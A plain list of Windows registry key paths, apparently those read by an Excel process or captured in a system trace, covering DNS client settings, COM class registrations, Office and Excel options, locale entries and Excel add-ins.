HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DoHPolicy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableAutoDoh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\IgnoreMismatchedDnsResponse
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableDdr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDdr
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicRegistrationFallback
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MaxConcurrentQueryCount
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxConcurrentQueryCount
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableUdpSocketsCache
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMulticast
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableMDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableNetbios
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableNetbios
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\NewDhcpSrvRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessPreferLocal
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableIdnEncoding
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableIdnEncoding
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShortnameProxyDefault
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutHistoryLength
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutRecalculationInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\WinSock_Registry_Version
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaSignUpUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MaxProcessInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ProcessInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseCategoryInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsURL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountWamAad
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\TrustedSiteUrlForUserAgentVersionInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\DisableTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SmartList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Tablet PC\IsTabletPC
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cookies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\AlwaysShowTeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\DontShowTeachingCallouts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TeachingCallouts\TellMeTeachingCalloutWXP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\UseHVSocket
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\ProviderId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\FlightCacheProviderId
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ResetTabletModeOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PointerModeInitVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook\ClicksData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sd-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sd-Deva-IN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\EnableApplicationFonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AddIns
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\NativeShim.InquireConnector.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\LoadBehavior
